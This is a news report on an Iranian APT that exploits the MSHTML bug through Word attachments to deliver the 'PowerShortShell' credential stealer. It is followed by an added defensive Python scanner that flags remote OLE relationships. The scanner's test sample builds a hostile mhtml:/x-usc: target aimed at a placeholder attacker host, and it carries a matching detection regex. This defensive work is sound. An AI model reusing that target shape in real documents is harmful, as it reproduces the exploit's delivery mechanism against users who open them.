The MSHTML bug is being used by a newly discovered Iranian APT group that steals Google and Instagram credentials using a new PowerShell-based stealer named “PowerShortShell”. The targets are Farsi speakers worldwide.
The infostealer also collects system information and performs Telegram surveillance on compromised devices, sending the gathered data to attacker-controlled servers together with the stolen credentials.
The attacks started in September as spear-phishing email campaigns in which the attacker sent Windows users malicious Word (Winword) attachments that exploit the Microsoft MSHTML remote code execution bug.
The PowerShortShell stealer payload is executed by a DLL downloaded onto compromised systems. Once launched, the PowerShell script collects data and screen snapshots and exfiltrates them to the attacker’s command-and-control server.
“The adversary might be tied to Iran’s Islamic regime since the Telegram surveillance usage is typical of Iran’s threat actors like Infy, Ferocious Kitten, and Rampant Kitten.”
“Almost half of the victims are located in the United States. Based on the Microsoft Word document content – which blames Iran’s leader for the ‘Corona massacre’ and the nature of the collected data, we assume that the victims might be Iranians who live abroad and might be seen as a threat to Iran’s Islamic regime,” said Tomer Bar.
An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine (MSHTML). The attacker would then have to convince the user to open the malicious document. Users whose accounts are configured with fewer user rights on the system could be less affected than users who operate with administrative rights.
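For the delivery chain described above (a Word attachment that makes Office load remote content into MSHTML, which in turn pulls down the DLL that launches PowerShortShell), the artefact a defender can inspect without opening the file is the document's relationship parts: a normal embedded OLE object points at a part inside the .docx, while the malicious documents point an OLE relationship at an external URL. The scanner below is an added example written for this article, not SafeBreach's or Microsoft's code. It builds its sample documents in memory (the `.invalid` hostnames are placeholders), flags any external `oleObject` relationship, and treats `mhtml:`/`x-usc:` targets as high severity because that prefix pattern appeared in publicly analysed exploit documents for this bug; that severity choice is the example's own, not something the article states.

```python
"""Flag Word documents whose OLE relationships point at a remote target.

Added example for this article, not code from SafeBreach or Microsoft.
Sample documents are constructed in memory; hostnames are placeholders.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"

# Severity heuristic chosen for this example: mhtml:/x-usc: targets are the
# pattern seen in public exploit documents; any other remote OLE target is
# unusual enough to review but gets a lower score.
HIGH_RISK = re.compile(r"^mhtml:|x-usc:", re.IGNORECASE)


def scan_docx(data: bytes) -> list:
    """Return one finding per external oleObject relationship in the package."""
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile as exc:
        raise ValueError("not an OOXML (zip) document") from exc
    with zf:
        for name in zf.namelist():
            if not name.lower().endswith(".rels"):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                # A relationships part that will not parse is itself worth a look.
                findings.append({"part": name, "target": "", "severity": "medium",
                                 "reason": "unparseable relationships part"})
                continue
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("Type") != OLE_REL:
                    continue
                if rel.get("TargetMode", "Internal") != "External":
                    continue  # object embedded in the package: the normal case
                target = rel.get("Target", "")
                findings.append({
                    "part": name,
                    "target": target,
                    "severity": "high" if HIGH_RISK.search(target) else "medium",
                    "reason": "OLE object loaded from outside the document",
                })
    return findings


def build_sample_docx(target: str, external: bool) -> bytes:
    """Constructed minimal .docx: just enough parts for the scanner to read.

    Real Word files carry many more parts; this is test input, not a document
    Word would necessarily open.
    """
    mode = ' TargetMode="External"' if external else ""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="rId1" Type="{OLE_REL}" Target="{target}"{mode}/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml",
                    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        zf.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    benign = build_sample_docx("embeddings/oleObject1.bin", external=False)
    hostile = build_sample_docx(
        "mhtml:http://attacker.invalid/word.html!x-usc:http://attacker.invalid/word.html",
        external=True)
    for label, doc in (("benign", benign), ("hostile", hostile)):
        for f in scan_docx(doc) or [{"severity": "none", "target": "-", "part": "-"}]:
            print(f"{label}: {f['severity']:6} {f['part']} -> {f['target']}")
```

The same walk over `*.rels` parts works for .xlsx and .pptx, since the relationship schema is shared across OOXML; only the part names differ. A remote OLE target is not proof of exploitation on its own, so the medium findings are triage input, while the high ones reproduce the exact shape of the weaponised attachments and merit blocking at the mail gateway.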